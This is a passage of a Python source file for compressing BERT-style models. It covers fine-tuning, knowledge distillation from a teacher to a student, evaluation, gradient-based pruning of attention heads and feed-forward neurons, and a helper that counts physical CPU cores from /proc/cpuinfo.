num_warmup_steps = int(args.warmup_ratio * t_total)
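    # Worked example of the step math above (illustrative numbers): with 10,000 training
    # examples, per-GPU batch size 32 on one GPU and gradient_accumulation_steps=2,
    # len(train_dataloader) = 313, so one epoch makes 313 // 2 = 156 optimizer steps;
    # 3 epochs give t_total = 468 and warmup_ratio=0.06 gives 28 warmup steps.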
# Prepare optimizer and schedule (linear warmup and decay)
no_decay = ["bias", "LayerNorm.weight"]
optimizer_grouped_parameters = [
{
"params": [p for n, p in model.named_parameters() if not any(nd in n for nd in no_decay)],
"weight_decay": args.weight_decay,
},
{"params": [p for n, p in model.named_parameters() if any(nd in n for nd in no_decay)], "weight_decay": 0.0},
]
optimizer = AdamW(optimizer_grouped_parameters, lr=args.learning_rate, eps=args.adam_epsilon)
scheduler = get_linear_schedule_with_warmup(
optimizer, num_warmup_steps=num_warmup_steps, num_training_steps=t_total
)
# Check if saved optimizer or scheduler states exist
if os.path.isfile(os.path.join(args.model_name_or_path, "optimizer.pt")) and os.path.isfile(
os.path.join(args.model_name_or_path, "scheduler.pt")
):
# Load in optimizer and scheduler states
optimizer.load_state_dict(torch.load(os.path.join(args.model_name_or_path, "optimizer.pt")))
scheduler.load_state_dict(torch.load(os.path.join(args.model_name_or_path, "scheduler.pt")))
if args.fp16:
try:
from apex import amp
except ImportError:
raise ImportError("Please install apex from https://www.github.com/nvidia/apex to use fp16 training.")
model, optimizer = amp.initialize(model, optimizer, opt_level=args.fp16_opt_level)
logger.info("Training with fp16.")
# multi-gpu training (should be after apex fp16 initialization)
if args.n_gpu > 1:
model = torch.nn.DataParallel(model)
# Distributed training (should be after apex fp16 initialization)
if args.local_rank != -1:
model = torch.nn.parallel.DistributedDataParallel(
model, device_ids=[args.local_rank], output_device=args.local_rank, find_unused_parameters=True,
)
# Train!
logger.info("***** Running training *****")
logger.info(" Num examples = %d", len(train_dataset))
logger.info(" Num Epochs = %d", args.num_train_epochs)
logger.info(" Instantaneous batch size per GPU = %d", args.per_gpu_train_batch_size)
logger.info(
" Total train batch size (w. parallel, distributed & accumulation) = %d",
args.train_batch_size
* args.gradient_accumulation_steps
* (torch.distributed.get_world_size() if args.local_rank != -1 else 1),
)
logger.info(" Gradient Accumulation steps = %d", args.gradient_accumulation_steps)
logger.info(" Total optimization steps = %d", t_total)
global_step = 0
epochs_trained = 0
steps_trained_in_current_epoch = 0
# Check if continuing training from a checkpoint
if os.path.exists(args.model_name_or_path):
# set global_step to global_step of last saved checkpoint from model path
try:
global_step = int(args.model_name_or_path.split("-")[-1].split("/")[0])
except ValueError:
global_step = 0
epochs_trained = global_step // (len(train_dataloader) // args.gradient_accumulation_steps)
steps_trained_in_current_epoch = global_step % (len(train_dataloader) // args.gradient_accumulation_steps)
logger.info(" Continuing training from checkpoint, will skip to saved global_step")
logger.info(" Continuing training from epoch %d", epochs_trained)
logger.info(" Continuing training from global step %d", global_step)
logger.info(" Will skip the first %d steps in the first epoch", steps_trained_in_current_epoch)
tr_loss, logging_loss = 0.0, 0.0
model.zero_grad()
# train_iterator = trange(
# epochs_trained, int(args.num_train_epochs), desc="Epoch", disable=args.local_rank not in [-1, 0],
# )
train_iterator = range(epochs_trained, int(args.num_train_epochs))
    set_seed(args)  # Added here for reproducibility
best_val_metric = None
for epoch_n in train_iterator:
epoch_iterator = tqdm(train_dataloader, desc=f"Epoch {epoch_n}", disable=args.local_rank not in [-1, 0])
for step, batch in enumerate(epoch_iterator):
# Skip past any already trained steps if resuming training
if steps_trained_in_current_epoch > 0:
steps_trained_in_current_epoch -= 1
continue
model.train()
batch = tuple(t.to(args.device) for t in batch)
inputs = {"input_ids": batch[0], "attention_mask": batch[1], "labels": batch[3]}
if args.output_mode == "span_classification":
inputs["spans"] = batch[4]
if args.model_type != "distilbert":
inputs["token_type_ids"] = (
batch[2] if args.model_type in ["bert", "xlnet", "albert"] else None
) # XLM, DistilBERT, RoBERTa, and XLM-RoBERTa don't use segment_ids
outputs = model(**inputs)
loss = outputs[0] # model outputs are always tuple in transformers (see doc)
if args.n_gpu > 1:
loss = loss.mean() # mean() to average on multi-gpu parallel training
if args.gradient_accumulation_steps > 1:
loss = loss / args.gradient_accumulation_steps
if args.fp16:
with amp.scale_loss(loss, optimizer) as scaled_loss:
scaled_loss.backward()
else:
loss.backward()
tr_loss += loss.item()
epoch_iterator.set_description(f"Epoch {epoch_n} loss: {loss:.3f}")
if (step + 1) % args.gradient_accumulation_steps == 0:
if args.fp16:
torch.nn.utils.clip_grad_norm_(amp.master_params(optimizer), args.max_grad_norm)
else:
torch.nn.utils.clip_grad_norm_(model.parameters(), args.max_grad_norm)
optimizer.step()
scheduler.step() # Update learning rate schedule
model.zero_grad()
global_step += 1
results = None
logs = {}
if args.local_rank in [-1, 0] and args.logging_steps > 0 and global_step % args.logging_steps == 0:
if (
args.local_rank == -1 and args.log_evaluate_during_training and results is None
): # Only evaluate when single GPU otherwise metrics may not average well
results, _, _ = evaluate(args, args.task_name, model, tokenizer, use_tqdm=False)
for key, value in results.items():
eval_key = "eval_{}".format(key)
logs[eval_key] = value
loss_scalar = (tr_loss - logging_loss) / args.logging_steps
learning_rate_scalar = scheduler.get_last_lr()[0]
logs["learning_rate"] = learning_rate_scalar
logs["avg_loss_since_last_log"] = loss_scalar
logging_loss = tr_loss
logging.info(json.dumps({**logs, **{"step": global_step}}))
if (
args.local_rank in [-1, 0]
and args.eval_and_save_steps > 0
and global_step % args.eval_and_save_steps == 0
):
# evaluate
results, _, _ = evaluate(args, args.task_name, model, tokenizer, use_tqdm=False)
for key, value in results.items():
logs[f"eval_{key}"] = value
logger.info(json.dumps({**logs, **{"step": global_step}}))
# save
if args.save_only_best:
output_dirs = []
else:
output_dirs = [os.path.join(args.output_dir, f"checkpoint-{global_step}")]
curr_val_metric = results[task_metrics[args.task_name]]
if best_val_metric is None or curr_val_metric > best_val_metric:
# check if best model so far
logger.info("Congratulations, best model so far!")
output_dirs.append(os.path.join(args.output_dir, "checkpoint-best"))
best_val_metric = curr_val_metric
for output_dir in output_dirs:
# in each dir, save model, tokenizer, args, optimizer, scheduler
if not os.path.exists(output_dir):
os.makedirs(output_dir)
model_to_save = (
model.module if hasattr(model, "module") else model
) # Take care of distributed/parallel training
logger.info("Saving model checkpoint to %s", output_dir)
model_to_save.save_pretrained(output_dir)
tokenizer.save_pretrained(output_dir)
torch.save(args, os.path.join(output_dir, "training_args.bin"))
torch.save(optimizer.state_dict(), os.path.join(output_dir, "optimizer.pt"))
torch.save(scheduler.state_dict(), os.path.join(output_dir, "scheduler.pt"))
logger.info("\tSaved model checkpoint to %s", output_dir)
if args.max_steps > 0 and global_step >= args.max_steps:
epoch_iterator.close()
break
if args.max_steps > 0 and global_step >= args.max_steps:
# train_iterator.close()
break
return global_step, tr_loss / global_step
def distill(args, train_dataset, teacher_model, student_model, tokenizer):
""" Train the model with distillation
    Assumes that the teacher and student models share the same token embedding layer,
    so the same data is loaded and fed to both the teacher and student models.
    This function's code is based on the TinyBERT implementation
(https://github.com/huawei-noah/Pretrained-Language-Model/tree/master/TinyBERT).
"""
############################################################################################
    # no multi-node distributed training, continued training or fp16 support for KD
############################################################################################
args.train_batch_size = args.per_gpu_train_batch_size * max(1, args.n_gpu)
train_sampler = RandomSampler(train_dataset) # no multi-node
train_dataloader = DataLoader(train_dataset, sampler=train_sampler, batch_size=args.train_batch_size)
if args.max_steps > 0:
t_total = args.max_steps
args.num_train_epochs = args.max_steps // (len(train_dataloader) // args.gradient_accumulation_steps) + 1
else: # number of training steps = number of epochs * number of batches
t_total = len(train_dataloader) // args.gradient_accumulation_steps * args.num_train_epochs
num_warmup_steps = int(args.warmup_ratio * t_total)
# Prepare optimizer and schedule (linear warmup and decay)
no_decay = ["bias", "LayerNorm.weight"]
optimizer_grouped_parameters = [
{
"params": [p for n, p in student_model.named_parameters() if not any(nd in n for nd in no_decay)],
"weight_decay": args.weight_decay,
},
{"params": [p for n, p in student_model.named_parameters() if any(nd in n for nd in no_decay)], "weight_decay": 0.0},
]
optimizer = AdamW(optimizer_grouped_parameters, lr=args.learning_rate, eps=args.adam_epsilon)
scheduler = get_linear_schedule_with_warmup(
optimizer, num_warmup_steps=num_warmup_steps, num_training_steps=t_total
)
# layer numbers of teacher and student
teacher_layer_num = teacher_model.config.num_hidden_layers
student_layer_num = student_model.config.num_hidden_layers
# multi-gpu training
if args.n_gpu > 1:
teacher_model = torch.nn.DataParallel(teacher_model)
student_model = torch.nn.DataParallel(student_model)
# Prepare loss functions
loss_mse = MSELoss()
loss_cs = CosineSimilarity(dim=2)
loss_cs_att = CosineSimilarity(dim=3)
def soft_cross_entropy(predicts, targets):
student_likelihood = torch.nn.functional.log_softmax(predicts, dim=-1)
targets_prob = torch.nn.functional.softmax(targets, dim=-1)
return (- targets_prob * student_likelihood).sum(dim=-1).mean()
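    # soft_cross_entropy above is the usual logit-distillation loss
    # KD(s, t) = -sum_j softmax(t_j) * log_softmax(s_j), averaged over the batch; it pulls
    # the student's output distribution toward the teacher's soft targets.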
# Distill!
logger.info("***** Running distillation training *****")
logger.info(" Num examples = %d", len(train_dataset))
logger.info(" Num Epochs = %d", args.num_train_epochs)
logger.info(" Instantaneous batch size per GPU = %d", args.per_gpu_train_batch_size)
logger.info(
" Total train batch size (w. parallel, distributed & accumulation) = %d",
args.train_batch_size
* args.gradient_accumulation_steps
* (torch.distributed.get_world_size() if args.local_rank != -1 else 1),
)
logger.info(" Gradient Accumulation steps = %d", args.gradient_accumulation_steps)
logger.info(" Total optimization steps = %d", t_total)
global_step = 0
epochs_trained = 0
steps_trained_in_current_epoch = 0
# Check if continuing training from a checkpoint
if os.path.exists(args.model_name_or_path):
# set global_step to global_step of last saved checkpoint from model path
try:
global_step = int(args.model_name_or_path.split("-")[-1].split("/")[0])
except ValueError:
global_step = 0
epochs_trained = global_step // (len(train_dataloader) // args.gradient_accumulation_steps)
steps_trained_in_current_epoch = global_step % (len(train_dataloader) // args.gradient_accumulation_steps)
logger.info(" Continuing training from checkpoint, will skip to saved global_step")
logger.info(" Continuing training from epoch %d", epochs_trained)
logger.info(" Continuing training from global step %d", global_step)
logger.info(" Will skip the first %d steps in the first epoch", steps_trained_in_current_epoch)
tr_loss, logging_loss = 0.0, 0.0
tr_att_loss = 0.
tr_rep_loss = 0.
tr_cls_loss = 0.
student_model.zero_grad()
train_iterator = range(epochs_trained, int(args.num_train_epochs))
    set_seed(args)  # Added here for reproducibility
best_val_metric = None
for epoch_n in train_iterator:
tr_att_loss = 0.
tr_rep_loss = 0.
tr_cls_loss = 0.
epoch_iterator = tqdm(train_dataloader, desc=f"Epoch {epoch_n}", disable=args.local_rank not in [-1, 0])
for step, batch in enumerate(epoch_iterator):
att_loss = 0.
rep_loss = 0.
cls_loss = 0.
# Skip past any already trained steps if resuming training
if steps_trained_in_current_epoch > 0:
steps_trained_in_current_epoch -= 1
continue
student_model.train()
batch = tuple(t.to(args.device) for t in batch)
inputs = {"input_ids": batch[0], "attention_mask": batch[1], "labels": batch[3]}
if args.output_mode == "span_classification":
inputs["spans"] = batch[4]
if args.model_type != "distilbert":
inputs["token_type_ids"] = (
batch[2] if args.model_type in ["bert", "xlnet", "albert"] else None
) # XLM, DistilBERT, RoBERTa, and XLM-RoBERTa don't use segment_ids
# student model output
outputs_student = student_model(output_attentions=True, output_hidden_states=True, **inputs)
# teacher model output
teacher_model.eval() # set teacher as eval mode
with torch.no_grad():
outputs_teacher = teacher_model(output_attentions=True, output_hidden_states=True, **inputs)
# Knowledge Distillation loss
# 1) logits distillation
kd_loss = soft_cross_entropy(outputs_student[1], outputs_teacher[1])
loss = kd_loss
tr_cls_loss += loss.item()
# 2) embedding and last hidden state distillation
if args.state_loss_ratio > 0.0:
teacher_reps = outputs_teacher[2]
student_reps = outputs_student[2]
new_teacher_reps = [teacher_reps[0], teacher_reps[teacher_layer_num]]
new_student_reps = [student_reps[0], student_reps[student_layer_num]]
for student_rep, teacher_rep in zip(new_student_reps, new_teacher_reps):
# cosine similarity loss
if args.state_distill_cs:
tmp_loss = 1.0 - loss_cs(student_rep, teacher_rep).mean()
# MSE loss
else:
tmp_loss = loss_mse(student_rep, teacher_rep)
rep_loss += tmp_loss
loss += args.state_loss_ratio * rep_loss
tr_rep_loss += rep_loss.item()
# 3) Attentions distillation
if args.att_loss_ratio > 0.0:
teacher_atts = outputs_teacher[3]
student_atts = outputs_student[3]
assert teacher_layer_num == len(teacher_atts)
assert student_layer_num == len(student_atts)
assert teacher_layer_num % student_layer_num == 0
layers_per_block = int(teacher_layer_num / student_layer_num)
new_teacher_atts = [teacher_atts[i * layers_per_block + layers_per_block - 1]
for i in range(student_layer_num)]
for student_att, teacher_att in zip(student_atts, new_teacher_atts):
student_att = torch.where(student_att <= -1e2, torch.zeros_like(student_att).to(args.device),
student_att)
teacher_att = torch.where(teacher_att <= -1e2, torch.zeros_like(teacher_att).to(args.device),
teacher_att)
tmp_loss = 1.0 - loss_cs_att(student_att, teacher_att).mean()
att_loss += tmp_loss
loss += args.att_loss_ratio * att_loss
tr_att_loss += att_loss.item()
if args.gradient_accumulation_steps > 1:
loss = loss / args.gradient_accumulation_steps
# back propagate
loss.backward()
tr_loss += loss.item()
epoch_iterator.set_description(f"Epoch {epoch_n} loss: {loss:.3f}")
if (step + 1) % args.gradient_accumulation_steps == 0:
torch.nn.utils.clip_grad_norm_(student_model.parameters(), args.max_grad_norm)
optimizer.step()
scheduler.step() # Update learning rate schedule
student_model.zero_grad()
global_step += 1
# change to evaluation mode
student_model.eval()
results = None
logs = {}
if args.local_rank in [-1, 0] and args.logging_steps > 0 and global_step % args.logging_steps == 0:
if (
args.local_rank == -1 and args.log_evaluate_during_training and results is None
): # Only evaluate when single GPU otherwise metrics may not average well
results, _, _ = evaluate(args, args.task_name, student_model, tokenizer, use_tqdm=False)
for key, value in results.items():
eval_key = "eval_{}".format(key)
logs[eval_key] = value
cls_loss = tr_cls_loss / (step + 1)
att_loss = tr_att_loss / (step + 1)
rep_loss = tr_rep_loss / (step + 1)
loss_scalar = (tr_loss - logging_loss) / args.logging_steps
learning_rate_scalar = scheduler.get_last_lr()[0]
logs["learning_rate"] = learning_rate_scalar
logs["avg_loss_since_last_log"] = loss_scalar
logs['cls_loss'] = cls_loss
logs['att_loss'] = att_loss
logs['rep_loss'] = rep_loss
logging_loss = tr_loss
logging.info(json.dumps({**logs, **{"step": global_step}}))
if (
args.local_rank in [-1, 0]
and args.eval_and_save_steps > 0
and global_step % args.eval_and_save_steps == 0
):
# evaluate
results, _, _ = evaluate(args, args.task_name, student_model, tokenizer, use_tqdm=False)
for key, value in results.items():
logs[f"eval_{key}"] = value
logger.info(json.dumps({**logs, **{"step": global_step}}))
# save
if args.save_only_best:
output_dirs = []
else:
output_dirs = [os.path.join(args.output_dir, f"checkpoint-{global_step}")]
curr_val_metric = results[task_metrics[args.task_name]]
if best_val_metric is None or curr_val_metric > best_val_metric or args.save_latest:
# check if best model so far
logger.info("Congratulations, best model so far!")
output_dirs.append(os.path.join(args.output_dir, "checkpoint-best"))
best_val_metric = curr_val_metric
for output_dir in output_dirs:
# in each dir, save model, tokenizer, args, optimizer, scheduler
if not os.path.exists(output_dir):
os.makedirs(output_dir)
model_to_save = (
student_model.module if hasattr(student_model, "module") else student_model
) # Take care of distributed/parallel training
logger.info("Saving model checkpoint to %s", output_dir)
model_to_save.save_pretrained(output_dir)
tokenizer.save_pretrained(output_dir)
torch.save(args, os.path.join(output_dir, "training_args.bin"))
torch.save(optimizer.state_dict(), os.path.join(output_dir, "optimizer.pt"))
torch.save(scheduler.state_dict(), os.path.join(output_dir, "scheduler.pt"))
logger.info("\tSaved model checkpoint to %s", output_dir)
# change student model back to train mode
student_model.train()
if args.max_steps > 0 and global_step >= args.max_steps:
epoch_iterator.close()
break
if args.max_steps > 0 and global_step >= args.max_steps:
# train_iterator.close()
break
return global_step, tr_loss / global_step
def evaluate(args, task_name, model, tokenizer, split="dev", prefix="", use_tqdm=True):
results = {}
if task_name == "record":
eval_dataset, eval_answers = load_and_cache_examples(args, task_name, tokenizer, split=split)
else:
eval_dataset = load_and_cache_examples(args, task_name, tokenizer, split=split)
eval_answers = None
if not os.path.exists(args.output_dir) and args.local_rank in [-1, 0]:
os.makedirs(args.output_dir)
if args.fp16:
model.half()
args.eval_batch_size = args.per_instance_eval_batch_size * max(1, args.n_gpu)
# Note that DistributedSampler samples randomly
eval_sampler = SequentialSampler(eval_dataset)
eval_dataloader = DataLoader(eval_dataset, sampler=eval_sampler, batch_size=args.eval_batch_size)
# multi-gpu eval
if args.n_gpu > 1 and not isinstance(model, torch.nn.DataParallel):
model = torch.nn.DataParallel(model)
# Eval!
logger.info(f"***** Running evaluation: {prefix} on {task_name} {split} *****")
logger.info(" Num examples = %d", len(eval_dataset))
logger.info(" Batch size = %d", args.eval_batch_size)
eval_loss = 0.0
nb_eval_steps = 0
preds = None
out_label_ids = None
ex_ids = None
eval_dataloader = tqdm(eval_dataloader, desc="Evaluating") if use_tqdm else eval_dataloader
for batch in eval_dataloader:
model.eval()
batch = tuple(t.to(args.device) for t in batch)
guids = batch[-1]
max_seq_length = batch[0].size(1)
if args.use_fixed_seq_length: # no dynamic sequence length
batch_seq_length = max_seq_length
else:
batch_seq_length = torch.max(batch[-2], 0)[0].item()
if batch_seq_length < max_seq_length:
inputs = {"input_ids": batch[0][:,:batch_seq_length].contiguous(),
"attention_mask": batch[1][:,:batch_seq_length].contiguous(),
"labels": batch[3]}
if args.output_mode == "span_classification":
inputs["spans"] = batch[4]
if args.model_type != "distilbert":
inputs["token_type_ids"] = (
batch[2][:,:batch_seq_length].contiguous() if args.model_type
in ["bert", "xlnet", "albert"] else None
) # XLM, DistilBERT, RoBERTa, and XLM-RoBERTa don't use segment_ids
else:
inputs = {"input_ids": batch[0], "attention_mask": batch[1], "labels": batch[3]}
if args.output_mode == "span_classification":
inputs["spans"] = batch[4]
if args.model_type != "distilbert":
inputs["token_type_ids"] = (
batch[2] if args.model_type in ["bert", "xlnet", "albert"] else None
) # XLM, DistilBERT, RoBERTa, and XLM-RoBERTa don't use segment_ids
with torch.no_grad():
outputs = model(**inputs)
tmp_eval_loss, logits = outputs[:2]
eval_loss += tmp_eval_loss.mean().item()
nb_eval_steps += 1
if preds is None:
preds = logits.detach().cpu().numpy()
out_label_ids = inputs["labels"].detach().cpu().numpy()
ex_ids = [guids.detach().cpu().numpy()]
else:
preds = np.append(preds, logits.detach().cpu().numpy(), axis=0)
out_label_ids = np.append(out_label_ids, inputs["labels"].detach().cpu().numpy(), axis=0)
ex_ids.append(guids.detach().cpu().numpy())
ex_ids = np.concatenate(ex_ids, axis=0)
eval_loss = eval_loss / nb_eval_steps
if args.output_mode in ["classification", "span_classification"] and args.task_name not in ["record"]:
preds = np.argmax(preds, axis=1)
elif args.output_mode == "regression":
preds = np.squeeze(preds)
if split != "test":
# don't have access to test labels, so skip evaluating on them
# NB(AW): forcing evaluation on ReCoRD on test (no labels) will error
result = compute_metrics(task_name, preds, out_label_ids, guids=ex_ids, answers=eval_answers)
results.update(result)
output_eval_file = os.path.join(args.output_dir, prefix, "eval_results.txt")
with open(output_eval_file, "w") as writer:
logger.info(f"***** {split} results: {prefix} *****")
for key in sorted(result.keys()):
logger.info(" %s = %s", key, str(result[key]))
writer.write("%s = %s\n" % (key, str(result[key])))
return results, preds, ex_ids
def sort_by_importance(weight, bias, importance, num_instances, stride):
importance_ordered = []
i = 0
for heads in importance:
heappush(importance_ordered, (-heads, i))
i += 1
sorted_weight_to_concat = None
sorted_bias_to_concat = None
i = 0
while importance_ordered and i < num_instances:
head_to_add = heappop(importance_ordered)[1]
if sorted_weight_to_concat is None:
sorted_weight_to_concat = (weight.narrow(0, int(head_to_add * stride), int(stride)), )
else:
sorted_weight_to_concat += (weight.narrow(0, int(head_to_add * stride), int(stride)), )
if bias is not None:
if sorted_bias_to_concat is None:
sorted_bias_to_concat = (bias.narrow(0, int(head_to_add * stride), int(stride)), )
else:
sorted_bias_to_concat += (bias.narrow(0, int(head_to_add * stride), int(stride)), )
i += 1
return torch.cat(sorted_weight_to_concat), torch.cat(sorted_bias_to_concat) if sorted_bias_to_concat is not None else None
def prune_rewire(args, task_name, model, tokenizer, prefix="", use_tqdm=True):
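    """Estimate attention-head and FFN importance from gradients on the dev set, then rewire.

    Heads and FFN neurons are sorted by importance, truncated to the target sizes,
    and the pruned model is saved under the output directory.
    """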
split="dev"
results = {}
if args.n_gpu > 1:
args.n_gpu = 1 # only 1 GPU is supported for pruning
args.device = 0
if task_name == "record":
eval_dataset, eval_answers = load_and_cache_examples(args, task_name, tokenizer, split=split)
else:
eval_dataset = load_and_cache_examples(args, task_name, tokenizer, split=split)
eval_answers = None
if not os.path.exists(args.output_dir) and args.local_rank in [-1, 0]:
os.makedirs(args.output_dir)
args.eval_batch_size = args.per_instance_eval_batch_size * max(1, args.n_gpu)
# Note that DistributedSampler samples randomly
eval_sampler = SequentialSampler(eval_dataset)
eval_dataloader = DataLoader(eval_dataset, sampler=eval_sampler, batch_size=args.eval_batch_size)
# multi-gpu eval
if args.n_gpu > 1 and not isinstance(model, torch.nn.DataParallel):
model = torch.nn.DataParallel(model)
# get the model ffn weights and biases
inter_weights = torch.zeros(model.config.num_hidden_layers, model.config.intermediate_size, model.config.hidden_size).to(args.device)
inter_biases = torch.zeros(model.config.num_hidden_layers, model.config.intermediate_size).to(args.device)
output_weights = torch.zeros(model.config.num_hidden_layers, model.config.hidden_size, model.config.intermediate_size).to(args.device)
layers = model.base_model.encoder.layer
head_importance = torch.zeros(model.config.num_hidden_layers, model.config.num_attention_heads).to(args.device)
ffn_importance = torch.zeros(model.config.num_hidden_layers, model.config.intermediate_size).to(args.device)
for layer_num in range(model.config.num_hidden_layers):
inter_weights[layer_num] = layers._modules[str(layer_num)].intermediate.dense.weight.detach().to(args.device)
inter_biases[layer_num] = layers._modules[str(layer_num)].intermediate.dense.bias.detach().to(args.device)
output_weights[layer_num] = layers._modules[str(layer_num)].output.dense.weight.detach().to(args.device)
head_mask = torch.ones(model.config.num_hidden_layers, model.config.num_attention_heads).to(args.device)
head_mask.requires_grad_(requires_grad=True)
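    # Gradients w.r.t. this all-ones mask are accumulated below as per-head importance scores.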
# Eval!
logger.info(f"***** Running evaluation: {prefix} on {task_name} {split} *****")
logger.info(" Num examples = %d", len(eval_dataset))
logger.info(" Batch size = %d", args.eval_batch_size)
eval_loss = 0.0
nb_eval_steps = 0
preds = None
out_label_ids = None
ex_ids = None
eval_dataloader = tqdm(eval_dataloader, desc="Evaluating") if use_tqdm else eval_dataloader
tot_tokens = 0.0
for batch in eval_dataloader:
model.eval()
batch = tuple(t.to(args.device) for t in batch)
guids = batch[-1]
inputs = {"input_ids": batch[0], "attention_mask": batch[1], "labels": batch[3]}
if args.output_mode == "span_classification":
inputs["spans"] = batch[4]
if args.model_type != "distilbert":
inputs["token_type_ids"] = (
batch[2] if args.model_type in ["bert", "xlnet", "albert"] else None
) # XLM, DistilBERT, RoBERTa, and XLM-RoBERTa don't use segment_ids
outputs = model(output_attentions=True, **inputs, head_mask=head_mask)
tmp_eval_loss, logits = outputs[:2]
eval_loss += tmp_eval_loss.mean().item()
# TODO accumulate? absolute value sum?
tmp_eval_loss.backward()
# collect attention confidence scores
head_importance += head_mask.grad.abs().detach()
# collect gradients of linear layers
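        # FFN neuron importance: |sum(weight * weight.grad) + bias * bias.grad| per intermediate unit (first-order sensitivity).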
for layer_num in range(model.config.num_hidden_layers):
ffn_importance[layer_num] += torch.abs(
torch.sum(layers._modules[str(layer_num)].intermediate.dense.weight.grad.detach()*inter_weights[layer_num], 1)
+ layers._modules[str(layer_num)].intermediate.dense.bias.grad.detach()*inter_biases[layer_num])
tot_tokens += inputs["attention_mask"].float().detach().sum().data
nb_eval_steps += 1
if preds is None:
preds = logits.detach().cpu().numpy()
out_label_ids = inputs["labels"].detach().cpu().numpy()
ex_ids = [guids.detach().cpu().numpy()]
else:
preds = np.append(preds, logits.detach().cpu().numpy(), axis=0)
out_label_ids = np.append(out_label_ids, inputs["labels"].detach().cpu().numpy(), axis=0)
ex_ids.append(guids.detach().cpu().numpy())
head_importance /= tot_tokens
# Layerwise importance normalization
if not args.dont_normalize_importance_by_layer:
exponent = 2
norm_by_layer = torch.pow(torch.pow(head_importance, exponent).sum(-1), 1 / exponent)
head_importance /= norm_by_layer.unsqueeze(-1) + 1e-20
# rewire the network
head_importance = head_importance.cpu()
ffn_importance = ffn_importance.cpu()
num_heads = model.config.num_attention_heads
head_size = model.config.hidden_size / num_heads
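    # Per-head slice width of the hidden dimension; used as the stride when slicing Q/K/V rows.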
for layer_num in range(model.config.num_hidden_layers):
# load query, key, value weights
query_weight = layers._modules[str(layer_num)].attention.self.query.weight
query_bias = layers._modules[str(layer_num)].attention.self.query.bias
key_weight = layers._modules[str(layer_num)].attention.self.key.weight
key_bias = layers._modules[str(layer_num)].attention.self.key.bias
value_weight = layers._modules[str(layer_num)].attention.self.value.weight
value_bias = layers._modules[str(layer_num)].attention.self.value.bias
# sort query, key, value based on the confidence scores
query_weight, query_bias = sort_by_importance(query_weight,
query_bias,
head_importance[layer_num],
args.target_num_heads,
head_size)
layers._modules[str(layer_num)].attention.self.query.weight = torch.nn.Parameter(query_weight)
layers._modules[str(layer_num)].attention.self.query.bias = torch.nn.Parameter(query_bias)
key_weight, key_bias = sort_by_importance(key_weight,
key_bias,
head_importance[layer_num],
args.target_num_heads,
head_size)
layers._modules[str(layer_num)].attention.self.key.weight = torch.nn.Parameter(key_weight)
layers._modules[str(layer_num)].attention.self.key.bias = torch.nn.Parameter(key_bias)
value_weight, value_bias = sort_by_importance(value_weight,
value_bias,
head_importance[layer_num],
args.target_num_heads,
head_size)
layers._modules[str(layer_num)].attention.self.value.weight = torch.nn.Parameter(value_weight)
layers._modules[str(layer_num)].attention.self.value.bias = torch.nn.Parameter(value_bias)
# output matrix
weight_sorted, _ = sort_by_importance(
layers._modules[str(layer_num)].attention.output.dense.weight.transpose(0, 1),
None,
head_importance[layer_num],
args.target_num_heads,
head_size)
weight_sorted = weight_sorted.transpose(0, 1)
layers._modules[str(layer_num)].attention.output.dense.weight = torch.nn.Parameter(weight_sorted)
weight_sorted, bias_sorted = sort_by_importance(
layers._modules[str(layer_num)].intermediate.dense.weight,
layers._modules[str(layer_num)].intermediate.dense.bias,
ffn_importance[layer_num],
args.target_ffn_dim,
1)
layers._modules[str(layer_num)].intermediate.dense.weight = torch.nn.Parameter(weight_sorted)
layers._modules[str(layer_num)].intermediate.dense.bias = torch.nn.Parameter(bias_sorted)
# ffn output matrix input side
weight_sorted, _ = sort_by_importance(
layers._modules[str(layer_num)].output.dense.weight.transpose(0, 1),
None,
ffn_importance[layer_num],
args.target_ffn_dim,
1)
weight_sorted = weight_sorted.transpose(0, 1)
layers._modules[str(layer_num)].output.dense.weight = torch.nn.Parameter(weight_sorted)
# save pruned model
    from pathlib import Path
    pruned_dir = args.output_dir + "/pruned_" + str(int(args.target_num_heads)) + "_" + str(int(args.target_ffn_dim))
    Path(pruned_dir).mkdir(exist_ok=True)
    model.config.hidden_act = 'relu'  # use ReLU activation for the pruned models.
    model.config.num_attention_heads = min([num_heads, args.target_num_heads])
    model.config.intermediate_size = layers._modules['0'].intermediate.dense.weight.size(0)
    model.config.save_pretrained(pruned_dir)
    model.save_pretrained(pruned_dir)
    tokenizer.save_pretrained(pruned_dir)
ex_ids = np.concatenate(ex_ids, axis=0)
eval_loss = eval_loss / nb_eval_steps
if args.output_mode in ["classification", "span_classification"] and args.task_name not in ["record"]:
preds = np.argmax(preds, axis=1)
elif args.output_mode == "regression":
preds = np.squeeze(preds)
if split != "test":
# don't have access to test labels, so skip evaluating on them
# NB(AW): forcing evaluation on ReCoRD on test (no labels) will error
result = compute_metrics(task_name, preds, out_label_ids, guids=ex_ids, answers=eval_answers)
results.update(result)
output_eval_file = os.path.join(args.output_dir, prefix, "eval_results.txt")
with open(output_eval_file, "w") as writer:
logger.info(f"***** {split} results: {prefix} *****")
for key in sorted(result.keys()):
logger.info(" %s = %s", key, str(result[key]))
writer.write("%s = %s\n" % (key, str(result[key])))
return results, preds, ex_ids
def get_procfs_path():
"""Return updated psutil.PROCFS_PATH constant."""
"""Copied from psutil code, and modified to fix an error."""
return sys.modules['psutil'].PROCFS_PATH
def cpu_count_physical():
"""Return the number of physical cores in the system."""
"""Copied from psutil code, and modified to fix an error."""
# Method #1 doesn't work for some dual socket topologies.
# # Method #1
# core_ids = set()
# for path in glob.glob(
# "/sys/devices/system/cpu/cpu[0-9]*/topology/core_id"):
# with open_binary(path) as f:
# core_ids.add(int(f.read()))
# result = len(core_ids)
# if result != 0:
# return result
# Method #2
physical_logical_mapping = {}
mapping = {}
current_info = {}
with open('%s/cpuinfo' % get_procfs_path(), "rb") as f:
for line in f:
line = line.strip().lower()
if not line:
# print(current_info)
# new section
if (b'physical id' in current_info and
b'cpu cores' in current_info):
mapping[current_info[b'physical id']] = \
current_info[b'cpu cores']
if (b'physical id' in current_info and
b'core id' in current_info and
b'processor' in current_info):
# print(current_info[b'physical id'] * 1000 + current_info[b'core id'])
if current_info[b'physical id'] * 1000 + current_info[b'core id'] not in physical_logical_mapping:
physical_logical_mapping[current_info[b'physical id'] * 1000 + current_info[b'core id']] = current_info[b'processor']
current_info = {}
else:
# ongoing section
if (line.startswith(b'physical id') or
line.startswith(b'cpu cores') or
line.startswith(b'core id') or
line.startswith(b'processor')):
key, value = line.split(b'\t:', 1)
current_info[key.rstrip()] = int(value.rstrip())
physical_processor_ids = []
for key in sorted(physical_logical_mapping.keys()):
physical_processor_ids.append(physical_logical_mapping[key])
result = sum(mapping.values())
# return result or None # mimic os.cpu_count()
